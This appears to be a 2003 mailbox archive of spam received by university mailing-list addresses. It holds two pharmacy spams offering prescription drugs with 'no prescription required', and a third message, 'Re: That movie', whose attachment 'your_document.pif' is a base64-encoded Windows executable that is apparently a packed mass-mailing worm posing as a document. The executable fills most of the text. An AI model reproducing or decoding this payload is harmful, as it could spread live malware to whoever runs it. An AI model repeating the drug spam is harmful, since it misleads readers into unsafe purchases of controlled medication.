>Go Online. Fill out your Prescription Request. Your request will be revie=
wed by a Licensed US Physician. If Approved, your medication will be dispe=
nsed by a Licensed US Pharmacy. <BR></FONT><FONT  COLOR=3D"#408080"
BACK=3D=
"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12
FAMILY=3D=
"SANSSERIF" FACE=3D"Arial" LANG=3D"0"><B>Requests received by 2:00 PM EST =
will arrive <BR>the very next business day.<BR></FONT><FONT  COLOR=3D"#000=
0ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D4
PTSIZE=3D=
14 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"><A HREF=3D"http://www.dp=
ils.biz/vpr6334/">MEDS_HERE</A></B></FONT><FONT COLOR=3D"#000000" BACK=3D"=
#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10
FAMILY=3D=
"SANSSERIF" FACE=3D"Arial" LANG=3D"0"></B><BR><BR><BR></FONT></HTML>=
cvvuznzv bib 
 wdhy ge woqfeohnajv
xvhchzj fonl ep zpeswciq ccl ws wsrfx
ajphvuhdhscq vipsckk

ps

--__D08E_5_.F_B_200.E--


From ycdlmsyolw@concentric.com Tue Sep  2 00:09:53 2003
Return-Path: <ycdlmsyolw@concentric.com>
Received: from c-67-163-17-90.client.comcast.net (c-67-163-17-90.client.comcast.net [67.163.17.90])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h8249mRY009084;
	Tue, 2 Sep 2003 00:09:50 -0400 (EDT)
Received: from [186.130.148.94] by c-67-163-17-90.client.comcast.net with ESMTP id 73653736; Tue, 02 Sep 2003 11:57:39 -0500
Message-ID: <k2046t$2lz78$ue2me@m89.fxd763p>
From: "Hubert Yu" <ycdlmsyolw@concentric.com>
Reply-To: "Hubert Yu" <ycdlmsyolw@concentric.com>
To: <199902071506.kaa20808@netlib2.cs.utk.edu>, <anon@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>
Subject: You can order Anti-depressants, weight loss meds,and pain relief meds online with NO PRESCRIPTION  dcqpoqix g jplbhfay
Date: Tue, 02 Sep 03 11:57:39 GMT
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="4961EFBEE.6DBD__CE9926"
X-Priority: 1
X-MSMail-Priority: High


--4961EFBEE.6DBD__CE9926
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

OUR US DOCTORS WILL WRITE YOU A PRESCRIPTION FOR FREE!<BR>Medications Like=
 SOMA, Phentermine, Adipex, Fioricet, Ultram<BR>Celebrex, Viagra, Valtrex,=
 Zyban And Much More.....<BR>Lowest Prices - No Prior Prescription Require=
d<BR>Our US Licensed Doctors Will Prescribe Your Medications For FREE<BR>A=
nd Then Have The Medications Shipped Overnight To Your Door FREE<BR> We As=
sure You The Absolute Best Value On The Internet !<BR><A HREF=3D"http://ww=
w.dpils.biz/vpr6334/">GET_YOUR_MEDS_HERE</A></B><BR><BR><BR>fvwrsbkeged neksmcutp uxwf
vmlqzljwymfzkiskp pwambzuvrl
shqki xkdbnfvsg  uxcjmtctsj
gwqxggqifyh

--4961EFBEE.6DBD__CE9926--


From Aurelie9397@aol.com Tue Sep  2 09:47:48 2003
Return-Path: <Aurelie9397@aol.com>
Received: from VIP9 ([62.56.191.253])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id h82DhtRY019637
	for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 2 Sep 2003 09:43:59 -0400 (EDT)
Message-Id: <200309021343.h82DhtRY019637@netlib2.cs.utk.edu>
From: <Aurelie9397@aol.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Re: That movie
Date: Tue, 2 Sep 2003 13:43:55 -0000
X-MailScanner: Found to be clean
Importance: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MSMail-Priority: Normal
X-Priority: 3 (Normal)
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="_NextPart_000_0167C188"

This is a multipart message in MIME format

--_NextPart_000_0167C188
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

See the attached file for details
--_NextPart_000_0167C188
Content-Type: application/octet-stream;
	name="your_document.pif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="your_document.pif"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAADToEjPl8EmnJfBJpyXwSacFN0onI3BJpx/3iyc7cEmnMHeNZyawSacl8Em
nJTBJpyXwSecBsEmnPXeNZyawSacf94tnI3BJpxSaWNol8EmnAAAAAAAAAAAAAAAAAAAAABQRQAA
TAEEAF2zPz8AAAAAAAAAAOAADwELAQYAAAAAAABwAAAAAAAA1usBAAAQAAAAYAEAAABAAAAQAAAA
AgAABAAAAAAAAAAEAAAAAAAAAAAAAgAAEAAAF/EBAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAA
AAAAAAAAAAAAAOLrAQCcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAfuwBAAgAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAgAC5zaHJpbmsAAFABAAAQAAAAxAAAABAAAAAAAAAAAAAAAAAAAEAAAMAu
c2hyaW5rAAAwAAAAYAEAABIAAADUAAAAAAAAAAAAAAAAAABAAADALnNocmluawAAQAAAAJABAAAS
AAAA5gAAAAAAAAAAAAAAAAAAQAAAwC5zaHJpbmsAADAAAADQAQAAIgAAAPgAAAAAAAAAAAAAAAAA
AEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
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
